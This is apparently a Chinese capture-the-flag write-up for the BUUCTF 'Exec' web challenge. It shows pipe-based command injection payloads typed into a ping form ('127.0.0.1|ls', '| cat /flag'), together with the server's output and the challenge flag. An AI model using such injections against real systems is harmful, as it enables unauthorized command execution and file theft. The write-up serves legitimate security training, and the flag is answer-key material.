[BUUCTF][Web][ACTF2020 新生赛]Exec 1

打开靶机对应url

显示可以输出ip 来进行ping操作

尝试试一下是否有命令注入的可能

127.0.0.1|ls

果然可以，输出结果

index.php
PING 127.0.0.1 (127.0.0.1): 56 data bytes

按照套路估计是在根目录，试一下

127.0.0.1|ls /

输出

bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

果然有flag文件，执行一下cat

127.0.0.1 | cat /flag

Boom

flag{52748aae-0332-451d-8c92-6c61ba2daf4e}